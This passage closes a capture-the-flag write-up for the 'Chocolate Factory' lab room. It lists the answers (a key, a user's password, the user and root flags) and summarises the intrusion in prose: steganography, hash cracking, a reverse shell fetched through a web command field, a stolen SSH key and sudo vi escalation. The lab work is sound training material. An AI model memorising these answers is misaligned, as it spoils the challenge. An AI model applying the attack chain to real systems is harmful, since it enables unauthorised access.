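If the key and token were copied correctly, the last line prints True; the remaining step, AES-128-CBC decryption of the 48-byte ciphertext with the second half of the key and PKCS7 unpadding, is what the cryptography package does for you in root.py. The token's timestamp (2020-10-01) also dates when the room author encrypted the flag.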
Task 1 – Introduction
Task 2 – Challenges
Question 1 – Enter the key you found!
b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
Question 2 – What is Charlie’s password?
cn7824
Question 3 – change user to charlie
Done
Question 4 – Enter the user flag
flag{cd5509042371b34e4826e4838b522d2e}
Question 5 – Enter the root flag
flag{cec59161d338fef787fcb4e296b42124}
Conclusion:
So that was Chocolate Factory. To summarize: a regular nmap scan found the usual services, FTP, SSH and HTTP. Anonymous FTP gave us an image, and steghide pulled a text file, b64.txt, out of it; its base64 content decodes to a copy of /etc/shadow whose only real hash belongs to charlie, and hashes.com cracked it. The password opens the web portal, which has a command execution field; we used it to curl a bash reverse shell into bash and got our first shell. Charlie's home directory held a world-readable SSH private key, which gave us a proper shell as charlie over SSH. Privilege escalation was a sudo rule allowing vi as root, exploited with the GTFOBins technique. The root flag is encrypted inside root.py and needs a key, which strings on the key_rev_key binary reveals; passing that key to root.py prints the root flag.